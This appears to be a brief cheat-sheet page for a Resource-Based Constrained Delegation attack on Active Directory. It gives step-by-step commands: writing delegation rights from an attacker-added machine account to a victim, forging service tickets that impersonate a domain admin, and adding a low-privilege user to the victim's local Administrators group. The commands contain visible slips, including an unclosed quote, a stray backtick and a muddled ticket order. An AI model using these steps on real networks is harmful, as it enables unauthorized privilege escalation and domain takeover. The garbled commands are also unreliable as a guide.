Skip to main content

rbcd.py

Example of doing the RBCD attack when you have the TGT of a user with write access to a victim machine

Delegate TO a victim box FROM the machine you added to AD

rbcd.py -delegate-from 'GHOSTY$' -delegate-to 'VICTIMSYSTEM$' -action 'write' 'domain.com/user-you-have-a-TGT-for -k -no-pass

Then use getst to request a TGS on behalf of a high privilege user.

getST.py -impersonate 'domainadmin' -spn 'cifs/victim.domain.com' 'domain.com/GHOSTY$' -k -no-pass
export KRB5CCNAME=domainadmin.ccache

Then use gettgt to request a TGT for the GHOSTY machine.

gettgt.py domain.com/GHOSTY$`
export KRB5CCNAME=GHOSTY.ccache

Then use getst one more time to request TGS on behalf of a high privilege user.

getST.py -impersonate 'domainadmin' -spn 'cifs/VICTIM.domain.com' 'domain.com/GHOSTY$'

Finally, use something like net.py to grant yourself local admin rights

net.py -k -no-pass VICTIM localgroup -name Administrators -join lowpriv